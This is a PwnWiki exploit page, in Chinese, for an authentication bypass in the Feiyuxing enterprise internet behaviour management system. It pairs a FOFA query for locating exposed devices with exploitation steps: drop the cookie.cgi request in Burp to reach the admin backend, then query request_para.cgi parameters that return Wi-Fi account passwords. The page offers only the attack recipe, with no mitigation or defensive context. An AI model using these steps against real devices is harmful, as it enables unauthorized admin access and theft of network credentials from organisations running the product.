飛魚星 企業級智能上網行為管理系統 權限繞過信息洩露漏洞

From PwnWiki
Revision as of 10:05, 20 April 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="飞鱼星企业级智能上网行为管理系统" </pre> ==漏洞利用== 訪問主頁使用Burp抓包; <pre> http://xxx.xxx.xxx.xxx/home/index.html...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

title="飞鱼星企业级智能上网行为管理系统"


漏洞利用

訪問主頁使用Burp抓包; 

http://xxx.xxx.xxx.xxx/home/index.html

使用Burp Dorp cookie.cgi請求包

成功越權後台,其中還存在敏感信息洩露 

/request_para.cgi?parameter=wifi_info #獲取ALL WIFI賬號密碼
/request_para.cgi?parameter=wifi_get_5g_host #獲取5GWIFI賬號密碼
/request_para.cgi?parameter=wifi_get_2g_host #獲取2GWIFI賬號密碼
Retrieved from "https://pwnwiki.com/index.php?title=飛魚星_企業級智能上網行為管理系統_權限繞過信息洩露漏洞&oldid=1745"